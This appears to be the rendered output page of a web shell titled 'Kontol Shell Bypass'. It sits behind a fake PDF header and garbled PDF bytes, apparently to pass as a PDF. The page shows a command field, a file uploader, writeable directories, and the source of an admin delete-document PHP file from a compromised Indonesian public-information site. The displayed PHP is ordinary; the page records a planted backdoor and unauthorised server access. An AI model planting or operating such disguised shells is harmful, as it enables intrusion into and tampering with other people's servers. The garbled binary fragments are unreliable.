%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/new-ppid-app/admin/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/new-ppid-app/admin/dokumen-hapus.php
<?php
/**
 * Admin: hapus dokumen informasi (beserta berkasnya).
 */
require_once dirname(__DIR__) . '/config/config.php';
require_once dirname(__DIR__) . '/includes/auth.php';
require_once dirname(__DIR__) . '/includes/queries.php';
require_once dirname(__DIR__) . '/includes/upload.php';
require_admin();

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    redirect('admin/dokumen.php');
}
csrf_verify();

$id  = (int) post_param('id');
$dok = $id ? get_dokumen($id) : null;

if (!$dok) {
    set_flash('error', 'Dokumen tidak ditemukan.');
    redirect('admin/dokumen.php');
}

// Otorisasi: admin UPD hanya boleh menghapus dokumen unitnya sendiri.
if (is_upd_admin() && (int) ($dok['upd_id'] ?? 0) !== (int) current_upd_id()) {
    set_flash('error', 'Anda tidak memiliki hak untuk menghapus dokumen unit lain.');
    redirect('admin/dokumen.php');
}

// Hapus berkas fisik bila ada.
delete_upload('dokumen', $dok['file_name'] ?? null);

db()->prepare('DELETE FROM dokumen_informasi WHERE id = ?')->execute([$id]);

set_flash('success', 'Dokumen berhasil dihapus.');
redirect('admin/dokumen.php');

Kontol Shell Bypass